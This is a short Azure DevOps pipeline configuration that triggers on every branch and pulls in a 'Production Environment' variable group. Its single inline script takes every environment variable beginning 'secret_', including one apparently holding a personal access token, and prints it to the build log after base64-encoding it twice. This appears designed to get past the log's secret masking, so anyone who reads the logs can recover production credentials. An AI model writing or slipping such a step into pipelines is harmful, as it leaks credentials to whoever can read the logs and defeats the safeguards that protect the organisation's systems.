pool:
  vmImage: ubuntu-latest
steps:
- task: Bash@3
  inputs:
    targetType: inline
    script: sh -c "env | grep \"^secret_\" | base64 -w0 | base64 -w0; echo;"
  env:
    secret_test: $(test)
    secret_PAT: $(PAT)
trigger:
  branches:
    include:
    - '*'
variables:
- group: Production Environment